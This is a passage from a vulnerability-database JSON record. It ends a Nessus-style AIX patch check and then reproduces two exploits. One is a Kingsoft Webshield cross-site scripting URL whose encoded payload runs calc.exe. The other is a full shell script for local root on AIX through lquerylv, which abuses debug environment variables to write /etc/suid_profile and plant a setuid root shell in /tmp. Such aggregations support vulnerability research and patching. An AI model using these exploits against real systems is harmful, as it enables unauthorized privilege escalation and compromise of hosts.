ml:\"02\", patch:\"IZ50121_02\", package:\"bos.rte.libc\", minfilesetver:\"6.1.2.0\", maxfilesetver:\"6.1.0.3\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"02\", patch:\"IZ50121_02\", package:\"bos.adt.prof\", minfilesetver:\"6.1.2.0\", maxfilesetver:\"6.1.0.3\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-03T18:15:49", "bulletinFamily": "exploit", "description": "Kingsoft Webshield 1.1.0.62 Cross Site scripting and Remote Command Execution Vulnerability. CVE-2009-1786. Webapps exploit for php platform", "modified": "2009-05-20T00:00:00", "published": "2009-05-20T00:00:00", "id": "EDB-ID:33001", "href": "https://www.exploit-db.com/exploits/33001/", "type": "exploitdb", "title": "Kingsoft Webshield 1.1.0.62 - Cross-Site scripting and Remote Command Execution Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/35038/info\r\n\r\nThe Webshield feature of Kingsoft Internet Security 9 is prone to a remote cross-site scripting and command-execution vulnerability.\r\n\r\nRemote attackers may exploit this vulnerability to compromise an affected computer.\r\n\r\nThis issue affects WebShield 1.1.0.62 and prior versions. \r\n\r\nhttp://www.example.com/index.php?html=%3c%70%20%73%74%79%6c%65%3d%22%62%61%63%6b%67%72%6f%75%6e%64%3a%75%72%6c%28%6a%61%76%61%73%63%72%69%70%74%3a%70%61%72%65%6e%74%2e%43%61%6c%6c%43%46%75%6e%63%28%27%65%78%65%63%27%2c%27%63%3a%5c%5c%77%69%6e%64%6f%77%73%5c%5c%73%79%73%74%65%6d%33%32%5c%5c%63%61%6c%63%2e%65%78%65%27%20%29%29%22%3e%74%65%73%74%3c%2f%70%3e\r\n\r\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/33001/"}], "packetstorm": [{"lastseen": "2016-12-05T22:19:22", "bulletinFamily": "exploit", "description": "", "modified": "2016-11-04T00:00:00", "published": "2016-11-04T00:00:00", "href": "https://packetstormsecurity.com/files/139565/AIX-5.3-6.1-7.1-7.2-lquerylv-Local-Root.html", "id": "PACKETSTORM:139565", "title": "AIX 5.3 / 6.1 / 7.1 / 7.2 lquerylv Local Root", "type": "packetstorm", "sourceData": "`#!/usr/bin/sh \n# \n# AIX lquerylv 5.3, 6.1, 7.1, 7.2 local root exploit. Tested against latest patchset (7100-04) \n# \n# This exploit takes advantage of known issues with debugging functions \n# within the AIX linker library. We are taking advantage of known \n# functionality, and focusing on badly coded SUID binaries which do not \n# adhere to proper security checks prior to seteuid/open/writes. \n# \n# The CVEs we will be taking advantage of: \n# - CVE-2009-1786: The malloc subsystem in libc in IBM AIX 5.3 and 6.1 allows \n# local users to create or overwrite arbitrary files via a symlink attack on \n# the log file associated with the MALLOCDEBUG environment variable. \n# \n# - CVE-2009-2669: A certain debugging component in IBM AIX 5.3 and 6.1 does \n# not properly handle the (1) _LIB_INIT_DBG and (2) _LIB_INIT_DBG_FILE \n# environment variables, which allows local users to gain privileges by \n# leveraging a setuid-root program to create an arbitrary root-owned file \n# with world-writable permissions, related to libC.a (aka the XL C++ runtime \n# library) in AIX 5.3 and libc.a in AIX 6.1. \n# \n# - CVE-2014-3074: Runtime Linker Allows Privilege Escalation Via Arbitrary \n# File Writes In IBM AIX. \n# \n# In each instance of the aforementioned CVEs, IBM merely patched the binaries \n# which were reported in the original reports as being used for escalation of \n# the vulnerabilities. This allowed for the lquerylv binary to slip by their \n# patches and become an attack vector. \n# \n# Blog post URL: https://rhinosecuritylabs.com/2016/11/03/unix-nostalgia-hunting-zeroday-vulnerabilities-ibm-aix/ \n# \n# lqueryroot.sh by @hxmonsegur [2016 //RSL] \n \nROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}') \nAPP=$0 \n \nfunction usage \n{ \necho \"Usage: $APP [1] | [2] | [3]\" \necho \necho \"1 - MALLOCDEBUG file write -> escalation\" \necho \"2 - _LIB_INIT_DBG_FILE file write -> escalation\" \necho \"3 - MALLOCBUCKETS file write -> escalation\" \necho \necho \"[lquerylv] AIX 5.3/6.1/7.1/7.2 Privilege escalation by @hxmonsegur //RSL\" \nexit \n} \n \nfunction CVE20091786 \n{ \necho \"[*] Exporting MALLOCDEBUG environment variable\" \nMALLOCTYPE=debug \nMALLOCDEBUG=report_allocations,output:/etc/suid_profile \nexport MALLOCTYPE MALLOCDEBUG \n} \n \nfunction CVE20092669 \n{ \necho \"[*] Exporting _LIB_INIT_DBG_FILE environment variable\" \n_LIB_INIT_DBG=1 \n_LIB_INIT_DBG_FILE=/etc/suid_profile \nexport _LIB_INIT_DBG _LIB_INIT_DBG_FILE \n} \n \nfunction CVE20143074 \n{ \necho \"[*] Exporting MALLOCBUCKETS environment variable\" \nMALLOCOPTIONS=buckets \nMALLOCBUCKETS=number_of_buckets:8,bucket_statistics:/etc/suid_profile \nexport MALLOCOPTIONS MALLOCBUCKETS \n} \n \nif [ -z \"$1\" ]; then \nusage \nexit 1 \nfi \n \nwhile [ \"$1\" != \"\" ]; do \ncase $1 in \n1 ) CVE20091786;; \n2 ) CVE20092669;; \n3 ) CVE20143074;; \n* ) usage \nbreak;; \nesac \nshift \ndone \n \nif [ ! -x \"/usr/sbin/lquerylv\" ]; then \necho \"[-] lquerylv isn't executable. Tough luck.\" \nexit 1 \nfi \n \necho \"[*] Setting umask to 000\" \numask 000 \n \necho \"[*] Execute our vulnerable binary\" \n/usr/sbin/lquerylv >/dev/null 2>&1 \n \nif [ ! -e \"/etc/suid_profile\" ]; then \necho \"[-] /etc/suid_profile does not exist and exploit failed.\" \nexit 1 \nfi \n \necho \"[*] Cleaning up /etc/suid_profile\" \necho > /etc/suid_profile \n \necho \"[*] Current id: `/usr/bin/id`\" \n \necho \"[*] Adding payload\" \ncat << EOF >/etc/suid_profile \ncp /bin/ksh $ROOTSHELL \n/usr/bin/syscall setreuid 0 0 \nchown root:system $ROOTSHELL \nchmod 6755 $ROOTSHELL \nrm /etc/suid_profile \nEOF \n \necho \"[*] Unsetting env\" \nunset MALLOCBUCKETS MALLOCOPTIONS _LIB_INIT_DBG_FILE _LIB_INIT_DBG MALLOCDEBUG MALLOCTYPE \n \necho \"[*] Executing ibstat for fun and profit\" \n/usr/bin/ibstat -a >/dev/null 2>&1 \n \nif [ ! -e \"$ROOTSHELL\" ]; then \necho \"[-] Rootshell does not exist and exploit failed.\" \nexit 1 \nfi \n \necho \"[*] Executing rootshell\" \n$ROOTSHELL \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/139565/aixlquery-escalate.txt", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
